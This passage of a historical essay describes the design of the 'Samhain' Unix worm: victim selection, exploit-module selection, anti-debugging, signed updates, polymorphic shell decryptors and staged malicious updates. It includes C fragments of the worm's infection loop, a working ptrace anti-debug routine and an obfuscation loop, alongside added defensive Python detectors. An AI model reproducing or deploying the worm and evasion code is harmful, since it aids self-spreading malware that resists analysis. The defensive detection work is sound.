Oh, spreading. Victims are chosen by monitoring active network connections.
With random probability, servers are picked from this list and attacked.
In case of success, the server is added to the 'visited' list - these are not
attacked anymore. In case of failure, the server is not attacked until a new
version of the worm is uploaded. Of course, the internal server list is finite
and sometimes a server might be attacked again (if it's not our child and
it isn't currently connected), but who cares, the attempt will be ignored or
the upgrade procedure will happen, depending on timestamps.

This code is used to qualify a host (obtained from network stats):

#include <netdb.h>          // gethostbyaddr(), struct hostent
#include <sys/socket.h>     // AF_INET

// remote[], VERY_SMALL, is_host_happy() and current_module are defined
// elsewhere in the worm source and are not shown here.
void infect_host(int addr) {
  struct hostent* h;
  int (*exp)(char*);                    // handler of the module being tried
  int i=0,n=0,max=VERY_SMALL;
  if ((0x7F & addr)==0x7F) return;      // do not touch 127.* subnet :-)
  h=gethostbyaddr((void*)&addr,4,AF_INET);
  if (is_host_happy(h->h_name)) return; // In wormnet?
  for (i=0;remote[i].present;i++) remote[i].used=0;
  while ((max=VERY_SMALL)) {            // reset max on every pass; VERY_SMALL is nonzero
    n=-1;
    // pick the not-yet-tried module with the best hit score
    for (i=0;remote[i].present;i++)
      if (!remote[i].used && remote[i].hits>=max) { max=remote[i].hits;n=i; }
    if (n<0) break;                     // every module has been tried
    exp=remote[n].handler;
    remote[n].used=1;
    current_module=n;
    remote[n].hits+=(i=exp(h->h_name)); // the result feeds back into the score
    if (i>0) break;                     // success, stop here
  }
}



0x05: Integrity
-----------------------------------------------------------------------------

The most important thing in a worm's life is not to get caught. We have to be
sure it's not easy to trace/debug us - we want to make reverse-engineering
even harder. We don't want to expose our internal wormnet protocols,
communication with the kernel module, the detection techniques worms use to
check for themselves, etc. Four things:

- hide everything: see section 0x02.
- hash, crypt, scramble: see sections 0x01, 0x04.
- don't let them catch you: see section 0x02.
- avoid debugging even if we cannot hide!

We used several anti-debugger techniques, including application-dependent
ones (bugs in strace when displaying some invalid parameters to syscalls, bugs
in gdb while parsing ELF headers, omitting the frame pointer, self-modifying
code and so on), as well as some universal debugger-killer routines called
quite often (they aren't really time-expensive). This is one of them:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

void kill_debug(void) {
  int x,n;
  n=getppid();                   // our parent: the debugger, if we were started under one
  if (!(x=fork())) {
    x=getppid();                 // in the child, x is the worm process itself
    if (ptrace(PTRACE_ATTACH,x,0,0)) {
      // attach failed: somebody else is already tracing the worm
      fprintf(stderr,
          "\n\n\n*****************************************\n"
          "*** I REALLY DO NOT LIKE TO BE TRACED ***\n"
          "*****************************************\n\n\n");
      ptrace(PTRACE_ATTACH,n,0,0); // grab (and stop) the suspected debugger...
      kill(x,9);                   // ...and SIGKILL the traced worm
    }
    usleep(1000);
    ptrace(PTRACE_DETACH,x,0,0);   // release the worm (no-op if the attach failed)
    exit(0);
  }
  waitpid(x,&n,0);                 // parent: wait for the probe child to finish
  return;
}
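A detection-side counterpart, added here as an example and not part of the original text: the probe child above is visible on Linux, because while it is attached it shows up as TracerPid in the worm's /proc/<pid>/status. The scanner below flags any process whose tracer is one of its own children; the status excerpts are constructed samples, and the /proc reader only runs on a live Linux box.

```python
import re
from pathlib import Path

# Constructed /proc/<pid>/status excerpts: 1000 is traced by its own child 1001
# (the fork + PTRACE_ATTACH pattern); 2000 is traced by an ordinary debugger.
SAMPLE_STATUS = {
    900:  "Name:\tbash\nPid:\t900\nPPid:\t1\nTracerPid:\t0\n",
    1000: "Name:\tw\nPid:\t1000\nPPid:\t900\nTracerPid:\t1001\n",
    1001: "Name:\tw\nPid:\t1001\nPPid:\t1000\nTracerPid:\t0\n",
    2000: "Name:\tfoo\nPid:\t2000\nPPid:\t900\nTracerPid:\t3000\n",
    3000: "Name:\tgdb\nPid:\t3000\nPPid:\t900\nTracerPid:\t0\n",
}

def parse_status(text):
    """Pull Name, PPid and TracerPid out of one /proc/<pid>/status body."""
    fields = dict(re.findall(r"^(\w+):\t(.*)$", text, re.M))
    return {"name": fields["Name"],
            "ppid": int(fields["PPid"]),
            "tracer": int(fields["TracerPid"])}

def read_live_procs():
    """Build the same table from the running system (Linux only)."""
    procs = {}
    for entry in Path("/proc").iterdir():
        if entry.name.isdigit():
            try:
                procs[int(entry.name)] = parse_status((entry / "status").read_text())
            except (OSError, KeyError):
                continue   # process vanished between listing and reading
    return procs

def self_traced(procs):
    """Return the pids whose tracer is one of their own children, sorted."""
    hits = []
    for pid, info in procs.items():
        tracer = info["tracer"]
        if tracer and tracer in procs and procs[tracer]["ppid"] == pid:
            hits.append(pid)
    return sorted(hits)

if __name__ == "__main__":
    sample = {pid: parse_status(txt) for pid, txt in SAMPLE_STATUS.items()}
    print("sample:", self_traced(sample))          # -> [1000]
    if Path("/proc").is_dir():
        print("live:", self_traced(read_live_procs()))
```

The attach window is short (the child detaches after about a millisecond), so a one-shot scan can miss it; syscall auditing of ptrace attach events catches the pattern more reliably.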

As I said before, worm modules were signed. First using simple signatures,
then using simple private-key signing (not really difficult to crack, as the
key was relatively short, but surely too difficult for amateurs). This made
sure we were going to replace our worm image with the REAL worm, not a
dummy anti-worm flare.

0x06: Polymorphism
-----------------------------------------------------------------------------

The polymorphic engine was quite simple - designed to make sure our decryptor
would be different every time. As it was written in shell, it was pretty easy
to add bogus commands, insert empty shell variables, add \ and break the
contents across lines, or even replace some parts with $SHELL_VARIABLES
declared before. Getting the original content back is not quite easy, but of
course, all you have to do is imitate the shell's parsing of this decryptor to
get the original contents; then you'll be able to identify at least some
common code.

Code adding \ to the decryptor looks like (decryptor is the input, buf the
scrambled output; x, y, you_can, norm and rnd() are declared elsewhere):

  while (decryptor[x]) {
    switch (decryptor[x]) {
      case ' ':
        // half the time emit an extra space without advancing x, so runs
        // of padding spaces appear at random
        if (!rnd(2)) buf[y++]=' '; else goto difolt;
        break;
      case '\n':
        if (!you_can) you_can=1;   // breaking is allowed from the 2nd line on
        // falls through
      default:
      difolt:
        // occasionally emit "\<newline>" instead of the character (not
        // next to redirections, and never more than every few chars)
        if ((you_can && you_can++>1) && !rnd(10) && decryptor[x]>5 &&
             decryptor[x]!='>' && decryptor[x]!='<' && norm>2) {
          buf[y++]='\\';buf[y++]=10;norm=0;
        } else {buf[y++]=decryptor[x++];norm++;}
    }
  }
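The recovery step the text hints at, as an added example that is not the original project's code: a small normalizer that undoes the scrambling listed above (backslash-newline breaks, padding spaces, bogus empty variables and $VAR indirection) and then matches the canonical lines against a signature. Quoting is deliberately not modelled (a real tool would tokenize like the shell), and the two scrambled stubs are constructed samples.

```python
import re

# Constructed samples: one decryptor stub, scrambled two different ways.
SCRAMBLED_A = """X1=
Z=/tmp/.w
echo  dummy >/dev/null
tail -n +3 "$0" | tr 'a-z' 'n-za-m' >$Z
sh $Z ; rm -f $Z
"""
SCRAMBLED_B = """Q=
T=/tmp/.w
tail -n +3 "$0" \\
 | tr  'a-z' \\
'n-za-m' >${T}
sh ${T} ;  rm  -f $T
"""
# Canonical form an analyst would write a signature on.
CORE = ['tail -n +3 "$0" | tr \'a-z\' \'n-za-m\' >/tmp/.w',
        "sh /tmp/.w ; rm -f /tmp/.w"]

ASSIGN = re.compile(r"([A-Za-z_]\w*)=(\S*)")      # VAR=value on a line of its own
VARREF = re.compile(r"\$\{?([A-Za-z_]\w*)\}?")   # $VAR or ${VAR}

def normalize(script):
    """Imitate the shell just enough to recover the decryptor's real lines."""
    env = {}
    out = []
    for raw in script.replace("\\\n", "").split("\n"):   # 1. join continuations
        line = " ".join(raw.split())                     # 2. squeeze whitespace
        if not line:
            continue
        m = ASSIGN.fullmatch(line)
        if m:                                            # 3. fold VAR=value away
            env[m.group(1)] = m.group(2)
            continue
        line = VARREF.sub(lambda v: env.get(v.group(1), ""), line)  # 4. expand
        line = " ".join(line.split())                    # empty vars leave gaps
        if line:
            out.append(line)
    return out

def matches_signature(script, core=CORE):
    """True when every canonical core line survives normalization."""
    return set(core) <= set(normalize(script))
```

Bogus commands are not filtered (there is no general rule for spotting them), which is why the match is on the core lines being present rather than on the whole script being identical.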

0x07: Usability
-----------------------------------------------------------------------------

It's stupid to launch a worm designed e.g. to steal secret information from a
specific host, because we have no idea if it will work fine and won't be
caught. If so, it might be debugged (it's made to be hard to debug, but, as
with every program, it's not impossible, especially if you're able to
separate the worm code). Instead, we should be able to release a 'harmless'
worm, then, when we're sure it has accessed the interesting host and hasn't
been caught, we might send an update, which will try to reach the destination
worm, replace it with our evil code, then shut down every worm it can access
via wormnet (by sending a signed update that will send itself to other worms,
then shut down).

Maybe it isn't the perfect solution, but in fact it's probably much safer
than inserting even generic backdoor code by default.


0x08: What happened then?
-----------------------------------------------------------------------------

That's it, the Samhain project, fit into approx. 40 kB of code. What
happened to it? Nothing. It has never been released, and I never removed the
restrictions from the lookup_victim() and infect_host() routines. It's still
lying on my hard drive, getting covered with dust and oblivion, and that's
exactly what we wanted.

I stopped developing new code and testing it in January 1999, with Samhain
2.2 and approx. 10000 lines of code. Wojtek Bojdol kept developing his
much more advanced wormnet and system infection/monitoring code till February
or March, but I haven't found enough time to incorporate his sources into the
mainstream source tree. Then we removed our repository from the networked
server we used to exchange ideas. I gradually published some of the bugs used
in the exploit database to BUGTRAQ; some of them (especially those not
discovered by me) we kept for ourselves.

The story ends. Till another rainy day, till another three bored hackers.
You may be sure it will happen. The only thing you can't be sure of is the
end of the next story.


0x0f: Outro
-----------------------------------------------------------------------------

First of all, all the best goes to Maja :)

Then, I'd especially like to thank people involved in the Samhain project, as
well as other people who helped me these times to understand life, universe
and everything:

Wojciech Bojdol ...................................................... wojboj
Sebastian Krahmer ................................................... stealth
Krzysztof G. Baranowski ................................................. kgb
Rafal Wojtczuk ....................................................... nergal
Slawomir Krawczyk .................................................... nises2
Mariusz Woloszyn ...................................................... kil3r
Mariusz Marcinkiewicz .................................................. manY

Also, I'd like to thank all the teso, HERT, lam3rz, A18 and b0f people. Thank
you, agnes, for good will and patience. Last, but not least, best wishes to
Solar Designer (thanks for interesting ideas and constructive criticism).

Any mistakes in this text are solely my fault. I'm really sorry for my
not-as-good-as-I-wish English; you have to deal with it, or correct me :)
I'd appreciate it.

This text was written in 6 hours, late on a Sunday night.

Please send flames, ideas and 'h0w t0 kr4ck p4ssw0rdz' to <lcamtuf@tpi.pl>
or <lcamtuf@dione.ids.pl>. This document is available at:

http://lcamtuf.na.export.pl/worm.txt

--

October, 31 - Samhain (pronounced sow-inn) - this is time of endings and
time of beginnings - so at Samhain, we celebrate the New Year. This is a
quieter time, a time when the veil between worlds is thin and the spirits
may pass more easily. At Mabon, the God Lugh died in order for us to live
through His abundance. During the intervening time, He has gathered the
spirits of those that have died over the year and waits for this night so
that they may pass through the gate to the other side. This is the time to
revere our ancestors and to say farewell to those that have passed this last
year. It is also a time of divination. The abundance of the fields now gives
way to the power and strength of the Horned God of the Hunt. This begins a
time of darkness. From now until Yule, the days grow darker and colder.
Winter storms begin to sweep down from the north.
